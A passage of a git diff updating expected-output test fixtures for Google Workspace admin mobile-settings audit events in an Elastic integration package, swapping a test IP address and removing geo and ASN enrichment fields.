+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_CANCEL_WIPE_THEN_APPROVE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_CANCEL_WIPE_THEN_BLOCK","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}} diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-mobile.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-mobile.log-expected.json index 29c8b0502ef..e3609db5e6d 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-mobile.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-mobile.log-expected.json @@ -10,7 +10,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -36,35 +36,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.821594900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ACTION_CANCELLED\",\"parameters\":[{\"name\":\"ACTION_ID\",\"value\":\"id\"},{\"name\":\"ACTION_TYPE\",\"value\":\"ACCOUNT_WIPE\"},{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:46.977331400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ACTION_CANCELLED\",\"parameters\":[{\"name\":\"ACTION_ID\",\"value\":\"id\"},{\"name\":\"ACTION_TYPE\",\"value\":\"ACCOUNT_WIPE\"},{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "ACTION_CANCELLED", "id": "1", @@ -95,7 +77,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -121,35 +103,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.821602500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ACTION_REQUESTED\",\"parameters\":[{\"name\":\"ACTION_ID\",\"value\":\"id\"},{\"name\":\"ACTION_TYPE\",\"value\":\"ACCOUNT_WIPE\"},{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:46.977336100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ACTION_REQUESTED\",\"parameters\":[{\"name\":\"ACTION_ID\",\"value\":\"id\"},{\"name\":\"ACTION_TYPE\",\"value\":\"ACCOUNT_WIPE\"},{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "ACTION_REQUESTED", "id": "1", @@ -180,7 +144,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -204,35 +168,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.821604800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ADD_MOBILE_CERTIFICATE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_CERTIFICATE_COMMON_NAME\",\"value\":\"name\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:46.977342Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ADD_MOBILE_CERTIFICATE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_CERTIFICATE_COMMON_NAME\",\"value\":\"name\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "ADD_MOBILE_CERTIFICATE", "id": "1", @@ -262,7 +208,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -286,35 +232,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.821607Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_DEVICES_BULK_CREATION\",\"parameters\":[{\"name\":\"NUMBER_OF_COMPANY_OWNED_DEVICES\",\"intValue\":10}]}}", + "ingested": "2021-12-09T13:38:46.977346Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_DEVICES_BULK_CREATION\",\"parameters\":[{\"name\":\"NUMBER_OF_COMPANY_OWNED_DEVICES\",\"intValue\":10}]}}", "provider": "admin", "action": "COMPANY_DEVICES_BULK_CREATION", "id": "1", @@ -344,7 +272,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -368,35 +296,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.821609100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_OWNED_DEVICE_BLOCKED\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}", + "ingested": "2021-12-09T13:38:46.977351400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_OWNED_DEVICE_BLOCKED\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}", "provider": "admin", "action": "COMPANY_OWNED_DEVICE_BLOCKED", "id": "1", @@ -426,7 +336,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -450,35 +360,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.821611500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_DEVICE_DELETION\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}", + "ingested": "2021-12-09T13:38:46.977356500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_DEVICE_DELETION\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}", "provider": "admin", "action": "COMPANY_DEVICE_DELETION", "id": "1", @@ -508,7 +400,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -532,35 +424,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.821613500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_OWNED_DEVICE_UNBLOCKED\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}", + "ingested": "2021-12-09T13:38:46.977362400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_OWNED_DEVICE_UNBLOCKED\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}", "provider": "admin", "action": "COMPANY_OWNED_DEVICE_UNBLOCKED", "id": "1", @@ -590,7 +464,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -614,35 +488,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.821615400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_OWNED_DEVICE_WIPED\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}", + "ingested": "2021-12-09T13:38:46.977367Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_OWNED_DEVICE_WIPED\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}", "provider": "admin", "action": "COMPANY_OWNED_DEVICE_WIPED", "id": "1", @@ -672,7 +528,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -696,35 +552,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.821617400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_APPLICATION_PERMISSION_GRANT\",\"parameters\":[{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"GROUP\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"NEW_PERMISSION_GRANT_STATE\",\"value\":\"GRANTED\"},{\"name\":\"OLD_PERMISSION_GRANT_STATE\",\"value\":\"DENIED\"},{\"name\":\"PERMISSION_GROUP_NAME\",\"value\":\"LOCATION\"}]}}", + "ingested": "2021-12-09T13:38:46.977371900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_APPLICATION_PERMISSION_GRANT\",\"parameters\":[{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"GROUP\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"NEW_PERMISSION_GRANT_STATE\",\"value\":\"GRANTED\"},{\"name\":\"OLD_PERMISSION_GRANT_STATE\",\"value\":\"DENIED\"},{\"name\":\"PERMISSION_GROUP_NAME\",\"value\":\"LOCATION\"}]}}", "provider": "admin", "action": "CHANGE_MOBILE_APPLICATION_PERMISSION_GRANT", "id": "1", @@ -754,7 +592,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -778,35 +616,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.821619300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_APPLICATION_PRIORITY_ORDER\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}", + "ingested": "2021-12-09T13:38:46.977408Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_APPLICATION_PRIORITY_ORDER\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}", "provider": "admin", "action": "CHANGE_MOBILE_APPLICATION_PRIORITY_ORDER", "id": "1", @@ -836,7 +656,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -860,35 +680,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.821621200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"REMOVE_MOBILE_APPLICATION_FROM_WHITELIST\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"ORG_UNIT\"}]}}", + "ingested": "2021-12-09T13:38:46.977440Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"REMOVE_MOBILE_APPLICATION_FROM_WHITELIST\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"ORG_UNIT\"}]}}", "provider": "admin", "action": "REMOVE_MOBILE_APPLICATION_FROM_WHITELIST", "id": "1", @@ -918,7 +720,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -942,35 +744,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.821623200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_APPLICATION_SETTINGS\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"ORG_UNIT\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "ingested": "2021-12-09T13:38:46.977446700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_APPLICATION_SETTINGS\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"ORG_UNIT\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_MOBILE_APPLICATION_SETTINGS", "id": "1", @@ -1001,7 +785,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1025,35 +809,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.821653700Z", - "original": 